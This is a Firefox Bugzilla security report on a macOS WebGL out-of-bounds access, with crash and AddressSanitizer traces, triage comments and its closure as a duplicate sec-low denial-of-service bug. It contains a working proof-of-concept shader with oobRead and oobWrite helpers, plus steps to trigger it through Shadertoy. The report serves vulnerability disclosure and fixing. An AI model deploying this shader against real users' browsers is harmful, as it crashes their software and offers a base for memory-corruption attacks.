Closed
Bug 1842110
Opened 2 years ago
Closed 2 years ago
OOB Access in Firefox WebGL
Categories
(Core :: Graphics: CanvasWebGL, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 1773874
People
(Reporter: d4ni31, Assigned: ErichDonGubler)
References
Details
(Keywords: csectype-dos, reporter-external, sec-low, Whiteboard: [disclosure deadline 2023-10-05])
User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Steps to reproduce:
Title
- Mozilla Firefox WebGL SwiftShader OOB Access Vulnerbility
Summary
- A Buffer Overflow vulnerability exists in the Firefox WebGL SwiftShader.
- An attacker must open a arbitrary generated HTML file to exploit this vulnerability.
- This vulnerability only works on macOS.
Test environment
- OS : macOS Ventura 13.4.1(22F82), macOS M1
- Product : Mozilla Firefox 115
Log
(lldb) c
Process 10763 resuming
Process 10763 stopped
* thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715d7ff8)
frame #0: 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
libsystem_pthread.dylib`:
-> 0x1966c2de0 <+60>: ldur x11, [x11, #-0x8]
0x1966c2de4 <+64>: mov x10, sp
0x1966c2de8 <+68>: cmp x9, #0x1, lsl #12 ; =0x1000
0x1966c2dec <+72>: b.lo 0x1966c2e04 ; <+96>
Target 0: (firefox) stopped.
(lldb) bt
* thread #25, name = 'CanvasRenderer', queue = 'OpenGLMT', stop reason = EXC_BAD_ACCESS (code=2, address=0x1715d7ff8)
* frame #0: 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
frame #1: 0x00000001fb39d0ec libGLProgrammability.dylib`phase2ProcessLValue + 460
frame #2: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #3: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #4: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #5: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #6: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #7: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #8: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #9: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #10: 0x00000001fb39c53c libGLProgrammability.dylib`phase2AddDef + 228
frame #11: 0x00000001fb39cc98 libGLProgrammability.dylib`phase2ProcessRawCall + 320
frame #12: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #13: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #14: 0x00000001fb39c668 libGLProgrammability.dylib`phase2Process + 72
frame #15: 0x00000001fb39c53c libGLProgrammability.dylib`phase2AddDef + 228
frame #16: 0x00000001fb321160 libGLProgrammability.dylib`glpASTMergePhase2 + 448
frame #17: 0x00000001fb34cc0c libGLProgrammability.dylib`glpLinkProgram + 276
frame #18: 0x00000001fb369140 libGLProgrammability.dylib`ShLink + 208
frame #19: 0x00000001fb51dac8 GLEngine`gleLinkProgram + 1228
frame #20: 0x00000001fb48bbcc GLEngine`glLinkProgramARB_Exec + 256
frame #21: 0x00000001fb48dd90 GLEngine`glLinkProgramARB_UnpackThread + 20
frame #22: 0x00000001fb4f5bfc GLEngine`gleCmdProcessor + 116
frame #23: 0x0000000196518400 libdispatch.dylib`_dispatch_client_callout + 20
frame #24: 0x000000019652797c libdispatch.dylib`_dispatch_lane_barrier_sync_invoke_and_complete + 56
frame #25: 0x00000001fb48df90 GLEngine`glGetProgramiv_ExecThread + 48
frame #26: 0x0000000114814cdc XUL`___lldb_unnamed_symbol164750 + 68
frame #27: 0x00000001153f8664 XUL`___lldb_unnamed_symbol213525 + 124
frame #28: 0x0000000111f3a760 XUL`___lldb_unnamed_symbol64847 + 596
frame #29: 0x00000001153e5d9c XUL`___lldb_unnamed_symbol213275 + 96
frame #30: 0x00000001153c9990 XUL`___lldb_unnamed_symbol212788 + 80
frame #31: 0x00000001154028d4 XUL`___lldb_unnamed_symbol213735 + 72
frame #32: 0x0000000111f3ee28 XUL`___lldb_unnamed_symbol64859 + 3148
frame #33: 0x000000011541e0d4 XUL`___lldb_unnamed_symbol214107 + 776
frame #34: 0x0000000114919000 XUL`___lldb_unnamed_symbol171852 + 308
frame #35: 0x000000011189b0a0 XUL`___lldb_unnamed_symbol50439 + 772
frame #36: 0x000000011189c2a4 XUL`___lldb_unnamed_symbol50447 + 168
frame #37: 0x00000001115a2ae4 XUL`___lldb_unnamed_symbol42631 + 1752
frame #38: 0x000000011189ec6c XUL`___lldb_unnamed_symbol50477 + 444
frame #39: 0x0000000111865fec XUL`___lldb_unnamed_symbol49845 + 80
frame #40: 0x000000011159fad4 XUL`___lldb_unnamed_symbol42601 + 304
frame #41: 0x0000000100d6b8d8 libnss3.dylib`___lldb_unnamed_symbol2273 + 260
frame #42: 0x00000001966c7fa8 libsystem_pthread.dylib`_pthread_start + 148
(lldb) reg read
General Purpose Registers:
x0 = 0x0000000007ffffff
x1 = 0x0000000000000000
x2 = 0x0000000000000000
x3 = 0x00000001fb31f948 libGLProgrammability.dylib`applevec4TypeSize
x4 = 0x00000002e81a0080
x5 = 0x0000000000000000
x6 = 0x0000000000000000
x7 = 0x0000000000000000
x8 = 0x0000000020000000
x9 = 0x000000001ffffffc
x10 = 0x00000001519d9144
x11 = 0x00000001715d8000
x12 = 0x0000000000000030
x13 = 0x0000000163f74040
x14 = 0x00007ad399f9ae14
x15 = 0xffffffffffffff00
x16 = 0x00000001966c2da4 libsystem_pthread.dylib`___chkstk_darwin
x17 = 0x00000001fb35c54c libGLProgrammability.dylib`glpPrimitiveVectorGetElementType + 52
x18 = 0x0000000000000000
x19 = 0x000000014b9c87d0
x20 = 0x00000001719d9980
x21 = 0x000000014b9c8850
x22 = 0x000000014b9c88f0
x23 = 0x00000001719d9140
x24 = 0x0000000000000011
x25 = 0x0000000000000001
x26 = 0x0000000000000000
x27 = 0x000000014b359fa0
x28 = 0x0000000000000000
fp = 0x00000001719d91c0
lr = 0x00000001fb39d0ec libGLProgrammability.dylib`phase2ProcessLValue + 460
sp = 0x00000001719d9140
pc = 0x00000001966c2de0 libsystem_pthread.dylib`___chkstk_darwin + 60
cpsr = 0x80001000
(lldb)
Reproduce
-
- For simplification, visit https://www.shadertoy.com/new
-
- Copy this shader
uvec4 magic[0x7ffffff];
uniform float q;
int weird(int a, int b) {
return int(mod(float(a), float(b)));
}
ivec3 oobIndex(int off) {
int arrayIndex = off / 0x40;
int vec4Index = weird(off, 0x40);
int compIndex = vec4Index / 0x10;
int combineIndex = weird(vec4Index, 0x10) / 8;
return ivec3(arrayIndex, compIndex, combineIndex);
}
uint oobRead(int off) {
ivec3 idx = oobIndex(off);
uvec4 comp = magic[idx.x];
return comp.x;
}
uint oobWrite(int off, uint value) {
ivec3 idx = oobIndex(off);
if (q != 1233112.0) {
magic[idx.x] = uvec4(value);
}
return magic[idx.x].x;
}
void mainImage( out vec4 fragColor, in vec2 fragCoord )
{
//uint v = oobRead(0x13371337);
uint v = oobWrite(0x13371337, uint(0x41414141));
fragColor = vec4(float(v), 0., 0. ,1.);
}
-
- Click run
Actual results:
.
Expected results:
.
|
Reporter | |
Comment 1•2 years ago
|
||
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-10-05.
|
|
Reporter | |
Updated•2 years ago
|
Summary: OOB Access in Firefox WebGL SwiftShader → OOB Access in Firefox WebGL
|
|
Reporter | |
Comment 2•2 years ago
|
||
Address Sanitizer
AddressSanitizer:DEADLYSIGNAL
=================================================================
==11982==ERROR: AddressSanitizer: BUS on unknown address (pc 0x0001966c2de0 bp 0x000172a03a30 sp 0x000172a039b0 T31)
==11982==The signal is caused by a READ memory access.
==11982==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used.
#0 0x1966c2de0 in ___chkstk_darwin+0x3c (libsystem_pthread.dylib:arm64+0x1de0) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#1 0x554d8001fb39c664 (<unknown module>)
#2 0xde058001fb39c664 (<unknown module>)
#3 0xb8158001fb39c664 (<unknown module>)
#4 0xcb430001fb39c664 (<unknown module>)
#5 0x21390001fb39c664 (<unknown module>)
#6 0xe05f8001fb39c664 (<unknown module>)
#7 0x8f448001fb39c664 (<unknown module>)
#8 0x9c598001fb39c664 (<unknown module>)
#9 0xc2340001fb39c538 (<unknown module>)
#10 0xb90d8001fb39cc94 (<unknown module>)
#11 0x68620001fb39c664 (<unknown module>)
#12 0x42500001fb39c664 (<unknown module>)
#13 0x54598001fb39c664 (<unknown module>)
#14 0x94640001fb39c538 (<unknown module>)
#15 0x8c128001fb32115c (<unknown module>)
#16 0xca5a8001fb34cc08 (<unknown module>)
#17 0x5a378001fb36913c (<unknown module>)
#18 0x6c488001fb51dac4 (<unknown module>)
#19 0x224c8001fb48bbc8 (<unknown module>)
#20 0x3e478001fb48dd8c (<unknown module>)
#21 0xc1670001fb4f5bf8 (<unknown module>)
#22 0x97318001006a61e8 (<unknown module>)
#23 0x1965183fc in _dispatch_client_callout+0x10 (libdispatch.dylib:arm64+0x43fc) (BuildId: c2fd3094b46539a4b77416583ff53c4b32000000200000000100000000040d00)
#24 0xab6e000196527978 (<unknown module>)
#25 0x542f8001006a646c (<unknown module>)
#26 0x1fb48df8c in glGetProgramiv_ExecThread+0x2c (GLEngine:arm64+0x7cf8c) (BuildId: 07f4fb2fb29a3ae29179e379a4ac0d1a32000000200000000100000000040d00)
#27 0x17e8001299816f8 (<unknown module>)
#28 0x12992c604 in mozilla::WebGLProgram::LinkProgram()+0x900 (XUL:arm64+0x6138604) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#29 0x12992b898 in mozilla::WebGLContext::LinkProgram(mozilla::WebGLProgram&)+0x134 (XUL:arm64+0x6137898) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#30 0x12999f3f8 in auto bool mozilla::MethodDispatcher<mozilla::WebGLMethodDispatcher, 49ul, void (mozilla::HostWebGLContext::*)(unsigned long long) const, &mozilla::HostWebGLContext::LinkProgram(unsigned long long) const>::DispatchCommand<mozilla::HostWebGLContext>(mozilla::HostWebGLContext&, unsigned long, mozilla::webgl::RangeConsumerView&)::'lambda'(auto&...)::operator()<unsigned long long>(auto&...) const+0x310 (XUL:arm64+0x61ab3f8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#31 0x12996e3f0 in mozilla::dom::WebGLParent::RecvDispatchCommands(mozilla::ipc::BigBuffer&&, unsigned long long)+0x3570 (XUL:arm64+0x617a3f0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#32 0x129a78eb8 in mozilla::dom::PWebGLParent::OnMessageReceived(IPC::Message const&)+0x808 (XUL:arm64+0x6284eb8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#33 0x126930b54 in mozilla::gfx::PCanvasManagerParent::OnMessageReceived(IPC::Message const&)+0x3a0 (XUL:arm64+0x313cb54) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#34 0x125887ac8 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&)+0x14c (XUL:arm64+0x2093ac8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#35 0x125885010 in mozilla::ipc::MessageChannel::DispatchMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::UniquePtr<IPC::Message, mozilla::DefaultDelete<IPC::Message>>)+0x41c (XUL:arm64+0x2091010) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#36 0x125885db4 in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::ActorLifecycleProxy*, mozilla::ipc::MessageChannel::MessageTask&)+0x2b4 (XUL:arm64+0x2091db4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#37 0x1258867ec in mozilla::ipc::MessageChannel::MessageTask::Run()+0x14c (XUL:arm64+0x20927ec) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#38 0x1244362a8 in nsThread::ProcessNextEvent(bool, bool*)+0x14ac (XUL:arm64+0xc422a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#39 0x124442018 in NS_ProcessNextEvent(nsIThread*, bool)+0x114 (XUL:arm64+0xc4e018) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#40 0x125890de0 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*)+0x264 (XUL:arm64+0x209cde0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#41 0x1257908bc in MessageLoop::Run()+0x1c4 (XUL:arm64+0x1f9c8bc) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#42 0x12442dd3c in nsThread::ThreadFunc(void*)+0x264 (XUL:arm64+0xc39d3c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#43 0x1034ad848 in _pt_root+0x388 (libnss3.dylib:arm64+0x391848) (BuildId: 4c4c44b855553144a11cbfa502b717f632000000200000000100000000000b00)
#44 0x1966c7fa4 in _pthread_start+0x90 (libsystem_pthread.dylib:arm64+0x6fa4) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00)
#45 0x68608001966c2d9c (<unknown module>)
==11982==Register values:
x[0] = 0x0000000007ffffff x[1] = 0x0000000000000000 x[2] = 0x0000000000000000 x[3] = 0x00000001fb31f948
x[4] = 0x0000000301a30080 x[5] = 0x0000000000000000 x[6] = 0x0000000172988000 x[7] = 0x0000000000000001
x[8] = 0x0000000020000000 x[9] = 0x000000001ffffffc x[10] = 0x0000000152a039b4 x[11] = 0x0000000172988000
x[12] = 0x0000007060565ff8 x[13] = 0x000000000003fffe x[14] = 0x000000000003fff8 x[15] = 0x00007fffffffffff
x[16] = 0x00000001966c2da4 x[17] = 0x00000001fb35c54c x[18] = 0x0000000000000000 x[19] = 0x000000011bfdc7d0
x[20] = 0x0000000172a041f0 x[21] = 0x000000011bfdc850 x[22] = 0x000000011bfdc8f0 x[23] = 0x0000000172a039b0
x[24] = 0x0000000000000011 x[25] = 0x0000000000000001 x[26] = 0x0000000000000000 x[27] = 0x0000613000634bb0
x[28] = 0x0000000000000000 fp = 0x0000000172a03a30 lr = 0x00000001fb39d0ec sp = 0x0000000172a039b0
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: BUS (libsystem_pthread.dylib:arm64+0x1de0) (BuildId: 46d35233a0513f4fbba4ba56dddc4d1a32000000200000000100000000040d00) in ___chkstk_darwin+0x3c
Thread T31 created by T0 here:
#0 0x1006a0a18 in wrap_pthread_create+0x50 (libclang_rt.asan_osx_dynamic.dylib:arm64+0x48a18) (BuildId: 4c4c44f255553144a133620af41d8f6c32000000200000000100000000000b00)
#1 0x10349da7c in _PR_CreateThread+0x44c (libnss3.dylib:arm64+0x381a7c) (BuildId: 4c4c44b855553144a11cbfa502b717f632000000200000000100000000000b00)
#2 0x124430768 in nsThread::Init(nsTSubstring<char> const&)+0x174 (XUL:arm64+0xc3c768) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#3 0x12443ff80 in nsThreadManager::NewNamedThread(nsTSubstring<char> const&, nsIThreadManager::ThreadCreationOptions, nsIThread**)+0x368 (XUL:arm64+0xc4bf80) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#4 0x12444d064 in NS_NewNamedThread(nsTSubstring<char> const&, nsIThread**, already_AddRefed<nsIRunnable>, nsIThreadManager::ThreadCreationOptions)+0x134 (XUL:arm64+0xc59064) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#5 0x1268fbfe4 in mozilla::gfx::CanvasRenderThread::Start()+0x1c0 (XUL:arm64+0x3107fe4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#6 0x1267608ac in gfxPlatform::InitLayersIPC()+0x80 (XUL:arm64+0x2f6c8ac) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#7 0x12675b450 in gfxPlatform::Init()+0x19a8 (XUL:arm64+0x2f67450) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#8 0x12675995c in gfxPlatform::GetPlatform()+0x2c (XUL:arm64+0x2f6595c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#9 0x12cf404f4 in mozilla::widget::GfxInfoBase::GetContentBackend(nsTSubstring<char16_t>&)+0xac (XUL:arm64+0x974c4f4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#10 0x124489e7c in _NS_InvokeByIndex+0x5c (XUL:arm64+0xc95e7c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#11 0x125b75240 in XPCWrappedNative::CallMethod(XPCCallContext&, XPCWrappedNative::CallMode)+0x2af0 (XUL:arm64+0x2381240) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#12 0x125b7ae58 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*)+0x54c (XUL:arm64+0x2386e58) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#13 0x130c78f34 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x8a4 (XUL:arm64+0xd484f34) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#14 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#15 0x130c7c4d0 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>)+0x254 (XUL:arm64+0xd4884d0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#16 0x1310096a8 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyKey>, JS::MutableHandle<JS::Value>)+0x12a0 (XUL:arm64+0xd8156a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#17 0x130c92ed4 in js::Interpret(JSContext*, js::RunState&)+0x11ee4 (XUL:arm64+0xd49eed4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#18 0x130c77e08 in js::RunScript(JSContext*, js::RunState&)+0x494 (XUL:arm64+0xd483e08) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#19 0x130c79040 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x9b0 (XUL:arm64+0xd485040) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#20 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#21 0x130c7c4d0 in js::CallGetter(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, JS::MutableHandle<JS::Value>)+0x254 (XUL:arm64+0xd4884d0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#22 0x1310096a8 in js::NativeGetProperty(JSContext*, JS::Handle<js::NativeObject*>, JS::Handle<JS::Value>, JS::Handle<JS::PropertyKey>, JS::MutableHandle<JS::Value>)+0x12a0 (XUL:arm64+0xd8156a8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#23 0x130cac934 in js::GetProperty(JSContext*, JS::Handle<JS::Value>, JS::Handle<js::PropertyName*>, JS::MutableHandle<JS::Value>)+0x82c (XUL:arm64+0xd4b8934) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#24 0x130c8a244 in js::Interpret(JSContext*, js::RunState&)+0x9254 (XUL:arm64+0xd496244) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#25 0x130c77e08 in js::RunScript(JSContext*, js::RunState&)+0x494 (XUL:arm64+0xd483e08) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#26 0x130c79040 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct, js::CallReason)+0x9b0 (XUL:arm64+0xd485040) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#27 0x130c7aa20 in js::Call(JSContext*, JS::Handle<JS::Value>, JS::Handle<JS::Value>, js::AnyInvokeArgs const&, JS::MutableHandle<JS::Value>, js::CallReason)+0x1dc (XUL:arm64+0xd486a20) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#28 0x130e190c4 in JS_CallFunctionValue(JSContext*, JS::Handle<JSObject*>, JS::Handle<JS::Value>, JS::HandleValueArray const&, JS::MutableHandle<JS::Value>)+0x480 (XUL:arm64+0xd6250c4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#29 0x125b65b24 in nsXPCWrappedJS::CallMethod(unsigned short, nsXPTMethodInfo const*, nsXPTCMiniVariant*)+0x1228 (XUL:arm64+0x2371b24) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#30 0x12448b960 in PrepareAndDispatch+0x970 (XUL:arm64+0xc97960) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#31 0x124489ecc in SharedStub+0x3c (XUL:arm64+0xc95ecc) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#32 0x1243d4ab0 in NS_CreateServicesFromCategory(char const*, nsISupports*, char const*, char16_t const*)+0x9b4 (XUL:arm64+0xbe0ab0) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#33 0x130a83f1c in nsXREDirProvider::DoStartup()+0x4a8 (XUL:arm64+0xd28ff1c) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#34 0x130a670a4 in XREMain::XRE_mainRun()+0xe84 (XUL:arm64+0xd2730a4) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#35 0x130a693b8 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&)+0xb5c (XUL:arm64+0xd2753b8) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#36 0x130a6a3ac in XRE_main(int, char**, mozilla::BootstrapConfig const&)+0x168 (XUL:arm64+0xd2763ac) (BuildId: 4c4c44c955553144a10862c863bf80b532000000200000000100000000000b00)
#37 0x10002918c in main+0x700 (firefox:arm64+0x10000118c) (BuildId: 4c4c449855553144a1301580c44a7d9332000000200000000100000000000b00)
#38 0x19636ff24 (<unknown module>)
#39 0x4a4dfffffffffffc (<unknown module>)
==11982==ABORTING
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
|
|
Reporter | |
Comment 3•2 years ago
|
||
|
||
Updated•2 years ago
|
Group: firefox-core-security → core-security
Component: Untriaged → Graphics: CanvasWebGL
Product: Firefox → Core
|
||
Comment 4•2 years ago
|
||
The patch is apparently https://chromium.googlesource.com/angle/angle/+/fe45418c6592ab210ba5a6101f5058fe24eed266%5E%21/#F0
Can confirm a nearly instant crash on Mac that looks like the stack in comment 0
bp-94f79790-6426-4621-b709-e36840230707
Group: core-security → gfx-core-security
status-firefox115:
--- → affected
status-firefox-esr115:
--- → affected
Keywords: sec-high
Whiteboard: [disclosure deadline 2023-10-05]
|
||
Comment 5•2 years ago
|
||
The bug has a release status flag that shows some version of Firefox is affected, thus it will be considered confirmed.
Status: UNCONFIRMED → NEW
Ever confirmed: true
|
||
Updated•2 years ago
|
status-firefox116:
--- → affected
status-firefox117:
--- → affected
|
||
Updated•2 years ago
|
Assignee: nobody → egubler
|
|
||
Comment 6•2 years ago
|
||
[Tracking Requested - why for this release]: This is a sec-high bug with a public test case (in the Chromium bug tracker) so it would be better to get this fixed sooner rather than later.
|
||
Comment 7•2 years ago
|
||
This is the same as bug 1773874, where we are protected by ___chkstk_darwin, thus sec-low, csectype-dos.
It does look like the patch linked in comment 4 is likely to be something we can cherry-pick as a fix though!
Status: NEW → RESOLVED
Closed: 2 years ago
tracking-firefox116:
? → ---
tracking-firefox117:
? → ---
tracking-firefox-esr115:
? → ---
Duplicate of bug: CVE-2023-4582
Resolution: --- → DUPLICATE
|
||
Updated•2 years ago
|
status-firefox115:
affected → ---
status-firefox116:
affected → ---
status-firefox117:
affected → ---
status-firefox-esr115:
affected → ---
|
|
||
Updated•2 years ago
|
Group: gfx-core-security
|
|
||
Comment 8•1 year ago
|
||
Sorry for the burst of bugspam: filter on tinkling-glitter-filtrate
Adding reporter-external keyword to security bugs found by non-employees for accounting reasons
Keywords: reporter-external
You need to log in
before you can comment on or make changes to this bug.
Description
•